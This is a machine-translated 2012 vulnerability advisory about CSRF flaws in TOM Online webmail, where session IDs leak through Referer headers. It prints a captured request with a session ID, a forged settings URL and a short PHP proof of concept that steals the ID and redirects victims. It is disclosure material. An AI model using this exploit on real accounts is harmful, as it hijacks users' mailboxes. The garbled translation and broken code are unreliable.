TOM Online WEB mailbox the presence of multiple CSRF vulnerabilities and fixes-vulnerability warning-the black bar safety net

2012-04-12T00:00:00
ID MYHACK58:62201233642
Type myhack58
Reporter 佚名
Modified 2012-04-12T00:00:00

Description

For contains a picture of the accessory, a request to Annex when the Referer will be exposed to the current sid, for example:

GET /mblogpic/be654a34c8f4aad1ec6a/2 0 0 0 HTTP/1.1

Host: t100. qpic. cn

Connection: keep-alive

Cache-Control: max-age=0

If-Modified-Since: Mon, 0 6 Apr 2 0 1 2 1 4:0 0:0 9 GMT

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.151 Safari/535.19

Accept: /

Referer: http://bjapp6.mail.tom.com/coremail/fcg/ldmsapp?funcid=readlett&sid=nAJcHTFziYRAMbTs&mid=1tbiEwEkBkV9AdrAoQAAsy%0A19%0A24%0A1&fid=1&ord=0&desc=1&start=0&fromsearch=1

Accept-Encoding: gzip,deflate,sdch

Accept-Language: EN-us,EN;q=0.8

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

DNT: 1

An attacker can construct a malicious image, to obtain the sid, and configured to redirect to achieve CSRF attacks, 例如添加test@test.com至黑名单 to:

http://bjapp6.mail.tom.com/cgi/ldapapp?sid=nAJcHTFziYRAMbTs&tempname=options%2Frefuselist. htm&funcid=opuserattr&optype=set&refuselist=test%40test. com&update. x=1

In order to achieve CSRF attacks

Vulnerability to prove:

Test code:

< ? php

$url = parse_url($_SERVER['HTTP_REFERER']);

$host = $url['host'];

parse_str($url['query']);

$loc = "http:// www.badguest.cn /cgi/ldapapp? sid=$sid&tempname=options%2Frefuselist. htm&funcid=opuserattr&optype=set&refuselist=test%40test. com&update. x=1";

header("Location: $loc");

?& gt;

Repair solutions:

In the URL to hide the sid attribute, restrictions the GET operation